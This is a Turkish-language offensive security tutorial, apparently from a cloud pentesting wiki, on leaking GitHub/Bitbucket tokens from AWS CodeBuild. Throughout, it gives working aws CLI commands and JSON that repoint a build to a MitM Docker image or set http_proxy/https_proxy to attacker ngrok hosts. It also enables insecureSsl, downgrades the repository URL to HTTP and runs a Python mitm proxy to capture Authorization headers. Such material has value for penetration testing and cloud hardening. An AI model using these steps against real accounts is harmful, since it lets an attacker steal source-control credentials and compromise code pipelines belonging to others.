AWS Codebuild - Token Leakage

Github/Bitbucket Yapılandırılmış Token'larını Kurtarma

Öncelikle, sızdırabileceğiniz herhangi bir kaynak kimlik bilgisi yapılandırılıp yapılandırılmadığını kontrol edin:

aws codebuild list-source-credentials

Docker Görüntüsü Üzerinden

Eğer örneğin Github'a kimlik doğrulamanın hesapta ayarlandığını bulursanız, Codebuild'i projeyi oluşturmak için belirli bir docker görüntüsü kullanmaya zorlayarak bu erişimi (GH token veya OAuth token) sızdırabilirsiniz.

Bu amaçla yeni bir Codebuild projesi oluşturabilir veya mevcut birinin ortamını değiştirerek Docker görüntüsünü ayarlayabilirsiniz.

Kullanabileceğiniz Docker görüntüsü https://github.com/carlospolop/docker-mitm. Bu, env değişkenlerini https_proxy, http_proxy ve SSL_CERT_FILE ayarlayacak çok temel bir Docker görüntüsüdür. Bu, https_proxy ve http_proxy'da belirtilen ana bilgisayarın trafiğinin çoğunu kesmenizi ve SSL_CERT_FILE'da belirtilen SSL CERT'ine güvenmenizi sağlar.

1. Kendi Docker MitM görüntünüzü oluşturun ve yükleyin

• Proxy IP adresinizi ayarlamak ve SSL sertifikanızı belirlemek için repo talimatlarını izleyin ve docker görüntüsünü oluşturun.

• Metadata uç noktasına yapılan istekleri kesmemek için http_proxy'yu ayarlamayın.

• Proxy'yi ana bilgisayarınıza ayarlamak için ngrok kullanabilirsiniz, örneğin ngrok tcp 4444.

• Docker görüntünüzü oluşturduktan sonra, bunu halka açık bir repoya yükleyin (Dockerhub, ECR...).

1. Ortamı ayarlayın

• Yeni bir Codebuild projesi oluşturun veya mevcut birinin ortamını değiştirin.

• Projeyi önceden oluşturulmuş Docker görüntüsünü kullanacak şekilde ayarlayın.

1. Ana bilgisayarınızda MitM proxy'yi ayarlayın

• Github repo'sunda belirtildiği gibi, şunu kullanabilirsiniz:

mitmproxy --listen-port 4444  --allow-hosts "github.com"

1. Yapıyı çalıştırın ve kimlik bilgilerini yakalayın

• Token'ı Authorization başlığında görebilirsiniz:

Bu, aws cli üzerinden de şöyle yapılabilir:

# Create project using a Github connection
aws codebuild create-project --cli-input-json file:///tmp/buildspec.json

## With /tmp/buildspec.json
{
"name": "my-demo-project",
"source": {
"type": "GITHUB",
"location": "https://github.com/uname/repo",
"buildspec": "buildspec.yml"
},
"artifacts": {
"type": "NO_ARTIFACTS"
},
"environment": {
"type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM
"image": "docker.io/carlospolop/docker-mitm:v12",
"computeType": "BUILD_GENERAL1_SMALL",
"imagePullCredentialsType": "CODEBUILD"
}
}

## Json

# Start the build
aws codebuild start-build --project-name my-project2

Via insecureSSL

Codebuild projelerinin, yalnızca API üzerinden değiştirilebilen, webde gizli bir ayarı olan insecureSsl vardır. Bunu etkinleştirmek, Codebuild'in platform tarafından sunulan sertifikayı kontrol etmeden depoya bağlanmasına olanak tanır.

• Öncelikle mevcut yapılandırmayı şu şekilde listelemeniz gerekir:

aws codebuild batch-get-projects --name <proj-name>

• Ardından, toplanan bilgilerle proje ayarını insecureSsl değerini True olarak güncelleyebilirsiniz. Aşağıda bir projeyi güncellememe dair bir örnek var, sonunda insecureSsl=True olduğunu unutmayın (bu, toplanan yapılandırmadan değiştirmeniz gereken tek şeydir).

• Ayrıca, tcp ngrok'unuza işaret eden http_proxy ve https_proxy ortam değişkenlerini de ekleyin:

aws codebuild update-project --name <proj-name> \
--source '{
"type": "GITHUB",
"location": "https://github.com/carlospolop/404checker",
"gitCloneDepth": 1,
"gitSubmodulesConfig": {
"fetchSubmodules": false
},
"buildspec": "version: 0.2\n\nphases:\n  build:\n    commands:\n       - echo \"sad\"\n",
"auth": {
"type": "CODECONNECTIONS",
"resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be"
},
"reportBuildStatus": false,
"insecureSsl": true
}' \
--environment '{
"type": "LINUX_CONTAINER",
"image": "aws/codebuild/standard:5.0",
"computeType": "BUILD_GENERAL1_SMALL",
"environmentVariables": [
{
"name": "http_proxy",
"value": "http://2.tcp.eu.ngrok.io:15027"
},
{
"name": "https_proxy",
"value": "http://2.tcp.eu.ngrok.io:15027"
}
]
}'

• Ardından, proxy değişkenleri tarafından belirtilen portta https://github.com/synchronizing/mitm adresinden temel örneği çalıştırın.

from mitm import MITM, protocol, middleware, crypto

mitm = MITM(
host="127.0.0.1",
port=4444,
protocols=[protocol.HTTP],
middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
certificate_authority = crypto.CertificateAuthority()
)
mitm.run()

• Son olarak, Projeyi oluştur butonuna tıklayın, kimlik bilgileri düz metin olarak (base64) mitm portuna gönderilecektir:

HTTP protokolü aracılığıyla

Yükseltilmiş izinlere sahip bir saldırgan, yapılandırılmış Github/Bitbucket token'ını sızdırabilir veya izinler OAuth aracılığıyla yapılandırılmışsa, koda erişmek için kullanılan geçici OAuth token'ını sızdırabilir.

• Bir saldırgan, kendi makinesine işaret eden http_proxy ve https_proxy ortam değişkenlerini CodeBuild projesine ekleyebilir (örneğin http://5.tcp.eu.ngrok.io:14972).

• Ardından, github reposunun URL'sini HTTPS yerine HTTP kullanacak şekilde değiştirin, örneğin: http://github.com/carlospolop-forks/TestActions

• Daha sonra, proxy değişkenleri (http_proxy ve https_proxy) tarafından işaret edilen portta https://github.com/synchronizing/mitm temel örneğini çalıştırın.

from mitm import MITM, protocol, middleware, crypto

mitm = MITM(
host="127.0.0.1",
port=4444,
protocols=[protocol.HTTP],
middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
certificate_authority = crypto.CertificateAuthority()
)
mitm.run()

• Son olarak, Projeyi oluştur butonuna tıklayın, kimlik bilgileri düz metin olarak (base64) mitm portuna gönderilecektir: